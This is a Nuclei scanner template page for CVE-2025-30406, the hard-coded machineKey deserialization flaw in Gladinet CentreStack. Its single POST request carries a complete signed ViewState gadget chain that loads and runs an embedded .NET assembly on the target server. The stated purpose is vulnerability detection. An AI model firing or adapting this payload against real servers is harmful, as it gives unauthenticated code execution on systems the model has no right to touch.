Gladinet CentreStack < 16.4.10315.56368 Use of Hard-coded Key Leads to Unauthenticated RCE

ID: CVE-2025-30406

Severity: critical

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve,cve2025,gladinet,rce,centrestack,deserialization

Description

Gladinet CentreStack through 16.1.10296.56315 (fixed in 16.4.10315.56368) has a deserialization vulnerability due to the CentreStack portal’s hardcoded machineKey use, as exploited in the wild in March 2025. This enables threat actors (who know the machineKey) to serialize a payload for server-side deserialization to achieve remote code execution.

YAML Source

id: CVE-2025-30406

info:
  name: Gladinet CentreStack < 16.4.10315.56368 Use of Hard-coded Key Leads to Unauthenticated RCE
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Gladinet CentreStack through 16.1.10296.56315 (fixed in 16.4.10315.56368) has a deserialization vulnerability due to the CentreStack portal's hardcoded machineKey use, as exploited in the wild in March 2025. This enables threat actors (who know the machineKey) to serialize a payload for server-side deserialization to achieve remote code execution.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-30406
    - https://gladinetsupport.s3.us-east-1.amazonaws.com/gladinet/securityadvisory-cve-2005.pdf
    - https://www.centrestack.com/p/gce_latest_release.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-30406
    cwe-id: CWE-502
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:1163764264
  tags: cve,cve2025,gladinet,rce,centrestack,deserialization

http:
  - raw:
      - |
        POST /portal/loginpage.aspx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        __LASTFOCUS=&__VIEWSTATE=%2FwEyoDEAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAwCAAAASVN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuU29ydGVkU2V0YDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAVDb3VudAhDb21wYXJlcgdWZXJzaW9uBUl0ZW1zAAMABgiNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQgCAAAAAgAAAAkDAAAAAgAAAAkEAAAABAMAAACNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQEAAAALX2NvbXBhcmlzb24DIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIJBQAAABEEAAAAAgAAAAYGAAAAAAYHAAAA9CA8UmVzb3VyY2VEaWN0aW9uYXJ5DQp4bWxucz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwvcHJlc2VudGF0aW9uIg0KeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQp4bWxuczpzPSJjbHItbmFtZXNwYWNlOlN5c3RlbTthc3NlbWJseT1tc2NvcmxpYiINCnhtbG5zOnI9ImNsci1uYW1lc3BhY2U6U3lzdGVtLlJlZmxlY3Rpb247YXNzZW1ibHk9bXNjb3JsaWIiDQp4bWxuczppPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5JTzthc3NlbWJseT1tc2NvcmxpYiINCnhtbG5zOmM9ImNsci1uYW1lc3BhY2U6U3lzdGVtLklPLkNvbXByZXNzaW9uO2Fzc2VtYmx5PVN5c3RlbSINCj4NCiAgIDxzOkFycmF5IHg6S2V5PSJkYXRhIiB4OkZhY3RvcnlNZXRob2Q9InM6Q29udmVydC5Gcm9tQmFzZTY0U3RyaW5nIj4NCiAgICAgIDx4OkFyZ3VtZW50cz4NCiAgICAgICAgIDxzOlN0cmluZz5INHNJQUFBQUFBQUVBTzFXM1U4Y1ZSVC96YksweTFJSXRGcExVc3NnMUZBL0p0dXlOdG9ZUzltRmdvRkNXQXJHa01EczdCV21tWjNaek16aTBnZXRENXI2WWpScGZETSttVFNtRHpWcFltTmk5QjhndnVpTFQzM3hXVjl0VlB6ZE83T3diRGNwTDZhSjRTejMzSFBQUFIrL2M3K0dtYmMvUlJ1QUpOdjJObkFmRVkzaThYU0RyYnYvdTI3YzY5Z2F1SzlOYncwc3JOdUJYdkc5TmQ4czY1YnB1bDZvRjRYdVYxM2Rkdlg4YkVFdmV5VmhkSFdsaCtJWWMrUEF0TmFHci9yL1hxdkhmWURFUUtmV0NSeEMxRWlHZE5CM2dQVW9PUkhoQm5aN0JTb1JpVzBZL1ZDYXlyL2RmcWRUOVBNZ3NCUVhmRHZSb3NoVjRNZysxdUlSSXI1VXd6REY4V1REMkFoRkxXU2ZUVWEycXM2bS9GU3ZHbjdnVzRpeEVhTXFOTFhYanVwUnd4ZU9aOFZZVitOWVJ4NnhHMnVHMlJOdnhLUnlhVWVOU1pkNUlMVDkxTmlDUGs4TTB6czlUSmhwcjEweUZwYjJHYTdpYzZrcjNtRU9YeUNRd3B0aldweEZ3dHpJR2hsakpETnk5aldwYVlkRGZwTFRnKzhCTjlrUFNia1ErcmE3RmtpTE82d3Z6Mzd3YWdGL0pLSTlIYng4ZFVycTVJRmVsdU14eHl2R3VHaWlYWDRLNkpDRGg2ZEhjRHlxc2I3c1VqN2NJTGNwcjNTTThCRE80RG55Ulp3bjN5QlA0emErSVArUnZCdC80bGRscDhWYy9ucndqS3BFeW5PNjFIOTBJcU1pOWlKRG56N0lVWWZpQTdpSGsrUmJiR2ZRcFQyUHMralRYb1NCVGtvR2p1RUNramVhMS9vV0dzNjl5dHVuK2tiZE1lSnIxbW1zWllkZW4vRktWVWU4QWQrcU9jSjJxMGJKY1RDT2NtQjV2bU1YVWRnTVFsSEdiUEdhc0VJWVZ1ajVzYzZZcjdxaFhSWkd6aXRYYkVmNEJlRnYySllJRUNuTTBQYmNlZUdZTlNVRmwwTHVYN0VhQ3NTTzBveFRSZHV4dzgzZDJUcVNlcG9sVWNSa0dGWnlucXR1elpvSVYzSlYzeGR1cVBUeklxZ3d2RkFUTzRQWU9lYzVEb0hML0VhaElpemJkT3pyb29Rclpsa3NtazVWN0Jvby8wbGhsb1FmSUtBOEpRc25EY3pCaDRkckVMQVE4dHpaQ0NoNVBBbEVpMDNnV1V2SkwrTWM5L01jWHFFMFFpbkxkbDZkaXQ4bWZ0cis3SnNQSnI2ODlja1BYdy8xUDBUcTIrdkxpMzNaQngrMzZkQ1N1cWFsVW5jdnJyemYrMHY2QXZmcWFHOVN4OUduSmV0cjF4TmFkM2RLaTYvOUtYbWdGaExIbDN5emNzVnp4MnVXcUVqMEMrdSs5MjRnYy8wMXVMdTlwK3J2Wmd1cTMvMjl0Skx6L0x6anpKaTJHeDBDSWRTUmtMUjltckY2V25rZDBQK0JOTFc1SjZLdjZCNjlQRmVaRm5wSjh0dngxaWkvNHczZnIrbEVsbndSQmF5UWoyT2UwaFJtY1lYaktmSUp5cEsrVC83K1Q2dXZ6Y1c0bCs5VzgyYzVyekl2d3VUZG0rQmRkSGp6cHVEaUhkNUlTVVBLYTRHekpyVUI1MDNlV3B1emJoemhidktPSm1NVXFQYzV3NnZmSXRKTlpaUForV1ZSbEd1QWw0aEkyN0hQczhuWFFNYXA3TW1qcXpWTE5kZ3VxdmNpYUxESjhIWGZiWHlPMFVWN2lTRlV0aTZ4TzF3dkUyV09RWTJGbW9vbFVWZnBWZUlvdXAzREN0YzA1OWFVVjQ1WktueWRKTEkxckNPTU1lVlZqdGxZYjhjNTZoamRmZVhLcXJxaWQ3SEVPZmt1TmxmWFhOdXJ5dWNTTFFKYWxybWFEdEhwai9VN29QK1E5T2ovcjB6MlNRTTVvQ2RCL3dMMVplTWxBQTRBQUE9PTwvczpTdHJpbmc%2BDQogICAgICA8L3g6QXJndW1lbnRzPg0KICAgPC9zOkFycmF5Pg0KICAgPGk6TWVtb3J5U3RyZWFtIHg6S2V5PSJpbnB1dFN0cmVhbSI%2BDQogICAgICA8eDpBcmd1bWVudHM%2BDQogICAgICAgICA8U3RhdGljUmVzb3VyY2UgUmVzb3VyY2VLZXk9ImRhdGEiPjwvU3RhdGljUmVzb3VyY2U%2BDQogICAgICA8L3g6QXJndW1lbnRzPg0KICAgPC9pOk1lbW9yeVN0cmVhbT4NCiAgIDxjOkdaaXBTdHJlYW0geDpLZXk9Imd6aXBTdHJlYW0iPg0KICAgICAgPHg6QXJndW1lbnRzPg0KICAgICAgICAgICAgPFN0YXRpY1Jlc291cmNlIFJlc291cmNlS2V5PSJpbnB1dFN0cmVhbSI%2BPC9TdGF0aWNSZXNvdXJjZT4NCiAgICAgICAgICAgIDxjOkNvbXByZXNzaW9uTW9kZT4wPC9jOkNvbXByZXNzaW9uTW9kZT4NCiAgICAgIDwveDpBcmd1bWVudHM%2BDQogICA8L2M6R1ppcFN0cmVhbT4NCiAgIDxzOkFycmF5IHg6S2V5PSJidWYiIHg6RmFjdG9yeU1ldGhvZD0iczpBcnJheS5DcmVhdGVJbnN0YW5jZSI%2BDQogICAgICA8eDpBcmd1bWVudHM%2BDQogICAgICAgICA8eDpUeXBlIFR5cGVOYW1lPSJzOkJ5dGUiLz4NCiAgICAgICAgIDx4OkludDMyPjM1ODQ8L3g6SW50MzI%2BDQogICAgICA8L3g6QXJndW1lbnRzPg0KICAgPC9zOkFycmF5Pg0KICAgPE9iamVjdERhdGFQcm92aWRlciB4OktleT0idG1wIiBPYmplY3RJbnN0YW5jZT0ie1N0YXRpY1Jlc291cmNlIGd6aXBTdHJlYW19IiBNZXRob2ROYW1lPSJSZWFkIj4NCiAgICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgIDxTdGF0aWNSZXNvdXJjZSBSZXNvdXJjZUtleT0iYnVmIj48L1N0YXRpY1Jlc291cmNlPg0KICAgICAgICAgPHg6SW50MzI%2BMDwveDpJbnQzMj4NCiAgICAgICAgIDx4OkludDMyPjM1ODQ8L3g6SW50MzI%2BDQogICAgICA8L09iamVjdERhdGFQcm92aWRlci5NZXRob2RQYXJhbWV0ZXJzPg0KICAgPC9PYmplY3REYXRhUHJvdmlkZXI%2BDQogICAgPE9iamVjdERhdGFQcm92aWRlciB4OktleT0iYXNtTG9hZCIgT2JqZWN0VHlwZT0ie3g6VHlwZSByOkFzc2VtYmx5fSIgTWV0aG9kTmFtZT0iTG9hZCI%2BDQogICAgICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgICAgIDxTdGF0aWNSZXNvdXJjZSBSZXNvdXJjZUtleT0iYnVmIj48L1N0YXRpY1Jlc291cmNlPg0KICAgICAgICA8L09iamVjdERhdGFQcm92aWRlci5NZXRob2RQYXJhbWV0ZXJzPg0KICAgIDwvT2JqZWN0RGF0YVByb3ZpZGVyPg0KICAgIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9InR5cGVzIiBPYmplY3RJbnN0YW5jZT0ie1N0YXRpY1Jlc291cmNlIGFzbUxvYWR9IiBNZXRob2ROYW1lPSJHZXRUeXBlcyI%2BDQogICAgICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycy8%2BDQogICAgPC9PYmplY3REYXRhUHJvdmlkZXI%2BDQogICAgPE9iamVjdERhdGFQcm92aWRlciB4OktleT0iZmlyc3RUeXBlIiBPYmplY3RJbnN0YW5jZT0ie1N0YXRpY1Jlc291cmNlIHR5cGVzfSIgTWV0aG9kTmFtZT0iR2V0VmFsdWUiPg0KICAgICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM%2BDQogICAgICAgICAgICA8czpJbnQzMj4wPC9zOkludDMyPg0KICAgICAgICA8L09iamVjdERhdGFQcm92aWRlci5NZXRob2RQYXJhbWV0ZXJzPg0KICAgIDwvT2JqZWN0RGF0YVByb3ZpZGVyPg0KICAgIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9ImNyZWF0ZUluc3RhbmNlIiBPYmplY3RJbnN0YW5jZT0ie1N0YXRpY1Jlc291cmNlIGZpcnN0VHlwZX0iIE1ldGhvZE5hbWU9Ikludm9rZU1lbWJlciI%2BDQogICAgICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgICAgIDx4Ok51bGwvPg0KICAgICAgICAgICAgPHI6QmluZGluZ0ZsYWdzPjUxMjwvcjpCaW5kaW5nRmxhZ3M%2BDQogICAgICAgICAgICA8eDpOdWxsLz4NCiAgICAgICAgICAgIDx4Ok51bGwvPg0KICAgICAgICAgICAgPHg6TnVsbC8%2BDQogICAgICAgICAgICA8eDpOdWxsLz4NCiAgICAgICAgICAgIDx4Ok51bGwvPg0KICAgICAgICAgICAgPHg6TnVsbC8%2BDQogICAgICAgIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM%2BDQogICAgPC9PYmplY3REYXRhUHJvdmlkZXI%2BDQo8L1Jlc291cmNlRGljdGlvbmFyeT4EBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAAMgBU3lzdGVtLkZ1bmNgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GDAAAAEttc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkKBg0AAABYUHJlc2VudGF0aW9uRnJhbWV3b3JrLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQYOAAAAIFN5c3RlbS5XaW5kb3dzLk1hcmt1cC5YYW1sUmVhZGVyBg8AAAAFUGFyc2UJEAAAAAQJAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQkPAAAACQ0AAAAJDgAAAAYUAAAAIlN5c3RlbS5PYmplY3QgUGFyc2UoU3lzdGVtLlN0cmluZykGFQAAACJTeXN0ZW0uT2JqZWN0IFBhcnNlKFN5c3RlbS5TdHJpbmcpCAAAAAoBCgAAAAkAAAAGFgAAAAdDb21wYXJlCQwAAAAGGAAAAA1TeXN0ZW0uU3RyaW5nBhkAAAArSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYaAAAAMlN5c3RlbS5JbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoBEAAAAAgAAAAGGwAAAHFTeXN0ZW0uQ29tcGFyaXNvbmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQkMAAAACgkMAAAACRgAAAAJFgAAAAoLibujtqUhA%2BW5jl2TpMa64%2FDxwzA5qSAh%2FW6ukat8VkI%3D

    matchers:
      - type: dsl
        dsl:
          - 'contains(to_lower(projectdiscovery), "cve-2025-30406")'
          - 'status_code == 302'
        condition: and
# digest: 490a004630440220606715b92c36f6e4e0c36b4d18fabe25f1f9d4ba2ff3e7a564e1d8d86fd554e4022016bd25681f4b39876e8045295a0c2c6ce805445a2cc23e368e75d2ed3ed3abe3:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2025/CVE-2025-30406.yaml"

View on Github